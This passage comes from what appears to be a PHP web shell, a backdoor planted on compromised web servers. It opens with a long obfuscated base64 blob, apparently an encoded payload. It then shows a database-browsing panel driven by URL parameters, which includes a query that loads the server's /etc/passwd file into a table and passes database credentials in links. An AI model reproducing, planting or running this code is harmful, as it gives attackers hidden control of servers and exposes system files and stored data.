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'))); ?></textarea>
  581. </td>
  582. </tr>
  583. <tr>
  584. <td>
  585. <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" />
  586. </td>
  587. </tr>
  588. </table>
  589. </form>
  590. <?php
  591. }
  592. elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql'))
  593. {
  594. if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport']))
  595. {
  596. $sqlhost = $_GET['sqlhost']; $sqluser = $_GET['sqluser']; $sqlpass = $_GET['sqlpass']; $sqlport = $_GET['sqlport'];
  597. if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass))
  598. {
  599. $msg .= "<div style=\"width:99%;padding:4px 10px 0 10px;\">";
  600. $msg .= "<p>Connected to ".$sqluser."<span class=\"gaya\">@</span>".$sqlhost.":".$sqlport;
  601. $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;</span>&nbsp;&nbsp;<a href=\"?y=".$pwd."&amp;x=mysql&amp;
  602. sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;
  603. sqlpass=".$sqlpass."&amp;
  604. sqlport=".$sqlport."&amp;\">[ databases ]</a>";
  605. if(isset($_GET['db']))
  606. $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;</span>&nbsp;&nbsp;
  607. <a href=\"y=".$pwd."&amp;x=mysql&amp;
  608. sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;
  609. sqlpass=".$sqlpass."&amp;
  610. sqlport=".$sqlport."&amp;
  611. db=".$_GET['db']."\">".htmlspecialchars($_GET['db'])."</a>";
  612. if(isset($_GET['table']))
  613. $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;
  614. </span>&nbsp;&nbsp;
  615. <a href=\"y=".$pwd."&amp;x=mysql&amp;
  616. sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;
  617. sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;
  618. db=".$_GET['db']."&amp;
  619. table=".$_GET['table']."\">".htmlspecialchars($_GET['table'])."</a>";
  620. $msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>";
  621. $msg .= "</div>";
  622. echo $msg;
  623. if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery'])))
  624. {
  625. $db = $_GET['db'];
  626. $query = "DROP TABLE IF EXISTS Newbie3viLc063s0_table;
  627. \nCREATE TABLE `Newbie3viLc063s0_table` ( `file` LONGBLOB NOT NULL );
  628. \nLOAD DATA INFILE \"/etc/passwd\"\nINTO TABLE Z3r0Z3r0_table;SELECT * FROM Newbie3viLc063s0_table;
  629. \nDROP TABLE IF EXISTS Newbie3viLc063s0_table;";
  630. $msg = "<div style=\"width:99%;padding:0 10px;\">
  631. <form action=\"?\" method=\"get\">
  632. <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  633. <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  634. <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  635. <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  636. <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  637. <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  638. <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  639. <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">$query</textarea></p>
  640. <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
  641. </form>
  642. </div> ";
  643. $tables = array();
  644. $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available tables on ".$db."</th></tr>";
  645. $hasil = @mysql_list_tables($db,$con);
  646. while(list($table) = @mysql_fetch_row($hasil))
  647. { @array_push($tables,$table); }
  648. @sort($tables);
  649. foreach($tables as $table)
  650. {
  651. $msg .= "<tr><td><a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."&amp;table=".$table."\">$table</a></td></tr>";
  652. }
  653. $msg .= "</table>";
  654. }
  655. elseif(isset($_GET['table']) && (!isset($_GET['sqlquery'])))
  656. {
  657. $db = $_GET['db'];
  658. $table = $_GET['table'];
  659. $query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;";
  660. $msgq = "<div style=\"width:99%;padding:0 10px;\">
  661. <form action=\"?\" method=\"get\">
  662. <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  663. <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  664. <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  665. <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  666. <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  667. <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  668. <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  669. <input type=\"hidden\" name=\"table\" value=\"".$table."\" />
  670. <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p>
  671. <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
  672. </form>
  673. </div> ";
  674. $columns = array();
  675. $msg = "<table class=\"explore\" style=\"width:99%;\">";
  676. $hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table);
  677. while(list($column) = @mysql_fetch_row($hasil))
  678. {
  679. $msg .= "<th>$column</th>"; $kolum = $column;
  680. }
  681. $msg .= "</tr>";
  682. $hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table);
  683. list($total) = mysql_fetch_row($hasil);
  684. if(isset($_GET['z'])) $page = (int) $_GET['z'];
  685. else $page = 1;
  686. $pagenum = 100;
  687. $totpage = ceil($total / $pagenum);
  688. $start = (($page - 1) * $pagenum);
  689. $hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum);
  690. while($datas = @mysql_fetch_assoc($hasil))
  691. {
  692. $msg .= "<tr>";
  693. foreach($datas as $data){ if(trim($data) == "") $data = "&nbsp;"; $msg .= "<td>$data</td>"; }
  694. $msg .= "</tr>";
  695. }
  696. $msg .= "</table>";
  697. $head = "<div style=\"padding:10px 0 0 6px;\">
  698. <form action=\"?\" method=\"get\">
  699. <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  700. <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  701. <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  702. <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
